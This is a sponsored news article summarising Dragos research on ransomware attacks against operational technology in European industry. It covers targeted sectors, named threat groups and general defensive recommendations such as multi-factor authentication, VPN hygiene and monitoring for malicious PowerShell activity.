The increasing impact of ransomware on operational technology

Dragos research has found a surge in ransomware attacks on operational technology, disproving that such threats only target IT

Operational technology — hardware and software that directly monitors and pulls the strings of equipment and processes — is a critical part of day-to-day life. Responsible for monitoring and controlling critical infrastructure and manufacturing operations, the usage of OT can be seen across an array of mission-critical sectors, such as utilities, oil and gas and transport.

However, such infrastructure has been in the headlines in recent times for coming under attack by ransomware, notable examples being meat processor JBS and fuel supplier Colonial Pipeline. Indeed, threat actors are no longer just targeting IT, but also the technology behind its processes, resulting in widespread damage, as well as financial and reputational losses.

According to research conducted by cyber security experts Dragos, industrial infrastructure across Europe is being targeted for geopolitical or financial reasons. In regards to particular industries observed by Dragos, the most frequently targeted were:

  • Manufacturing (61 per cent);
  • Transportation (15 per cent);
  • Water (9 per cent);
  • Energy (8 per cent).

With this in mind, we delve deeper into Dragos’s findings to explore the impact of ransomware on operational technology.

The impacts of ransomware on OT

Ransomware threat actors are always evolving their tactics, growing attacks, raising stakes and increasing vulnerability intelligence. Due to the crucial and sensitive nature of infrastructure operations, victim organisations find themselves stuck between a rock and a hard place — a decision of whether to pay the ransom (often not recommended by experts) or shut operations down, putting critical supplies on hold.

Impact on OT, according to Dragos, manifests itself in four ways:

  1. Preemptive shut down of operations to prevent ransomware spread into OT, which protects the technology from long-term damage (as seen with the Colonial Pipeline attack).
  2. Quick spread of ransomware due to flat networks and a lack of visibility.
  3. Six ransomware strains contain built-in OT process kill lists: Cl0p; EKANS; LockerGoga; Maze; MegaCortex; and Netfilim.
  4. Attacks that solely target enterprise IT can lead to documentation on operational technology being leaked onto underground forums if the ransom isn’t paid, and in turn follow-on attacks on OT.

Major activity groups

Dragos has found an array of prominent activity groups ravaging European industrial infrastructure with ransomware in recent times. The most active groups being monitored include:

  • ALLANITE: The ALLIANTE group targets electric utility enterprise and OT networks based across the UK and US, as well as industrial infrastructure across Germany. The group constantly surveys OT environments for vulnerabilities.
  • DYMALLOY: Victims of attacks carried out by the DYMALLOY group include Europe, North America and Turkey-based electric and oil and gas providers. According to Dragos, the group is capable of carrying out long-term and persistent intelligence collection and future disruption events.
  • ELECTRUM: Found to be behind the 2016 CRASHOVERRIDE event in Ukraine, ELECTRUM can develop malware that leverages OT protocols and communications to modify the processes of electric equipment.
  • MAGNALLUM: Starting in Saudi Arabia, targeting aviation and oil and gas companies, MAGNALLUM expanded to Europe and North America in 2020, with a possible emphasis on semiconductor manufacturing and governmental bodies. Malicious samples found here came in the form of Hypertext Markup Language (HTML).
  • PARASITE: Targeting aerospace, oil and gas and utilities firms, this group targets VPN vulnerabilities and damage infrastructure using open source tools. According to Dragos, PARASITE has been active since 2017.
  • XENOTIME: Initially starting in the Middle East, the XENOTIME activity group began expanding into Europe in 2018, targeting oil and gas companies. Particularly, Dragos moderately believes that this group is capable of exploiting oil and gas operations in the North Sea.

Going forward, Dragos will look to continue keeping tabs on the activity of these groups, which are set to continue evolving to evade security measures.

Keeping OT protected

To keep operational technology protected against ransomware attacks going forward, Dragos recommends taking appropriate measures for initial intrusion defence, network access defence and host-based defence. A strategy that takes all of these areas into account, while staying vigilant, is vital towards keeping ransomware threat actors at bay.

Initial intrusion

To protect against initial intrusion of networks, organisations must consistently find and remediate key vulnerabilities and known exploits, while monitoring the network for attack attempts. Also, wherever possible equipment should be kept up-to-date.

VPNs in particular need close attention from cyber security personnel; new VPN keys and certificates must be created, with logging of activity over VPNs being enabled. Access to OT environments via VPNs calls for architecture reviews, multi-factor authentication (MFA) and jump hosts.

In addition, users should read emails in plain text only, as opposed to rendering HTML, and disable Microsoft Office macros.

Network access

For network access attempts from threat actors, organisations should perform an architecture review for routing protocols involving OT, and monitor for the use of open source tools.

MFA should be implemented to access OT systems, and intelligence sources utilised for threat and communication identification and tracking.

Host-based threats

For host-based ransomware threats, possible malicious PowerShell, Windows Management Instrumentation (WMI), and Python activity should be monitored, as well as malicious HTA payloads that lead to PowerShell execution.

Cyber security teams should also keep a close eye on possible use of credential stealing tools; unusual enumeration and use of system tools; and new services and scheduled tasks on hosts.

For more information on Dragos’s research around ransomware’s impact on operational infrastructure, download the Dragos European Industrial Infrastructure Cyber Threat Perspective report, here.

This article was written as part of a content campaign with Dragos.


IoT, blockchain and the future of the energy sector — Phil Skipper, head of IoT strategy at Vodafone Business IoT, discusses how IoT and blockchain can shape the future of the energy sector.

Tech Leader Profile: leading utilities IT strategy as CIO of Northumbrian Water — Nigel Watson, CIO of Northumbrian Water, spoke to Information Age about how he ensures tech leadership success in the utilities space.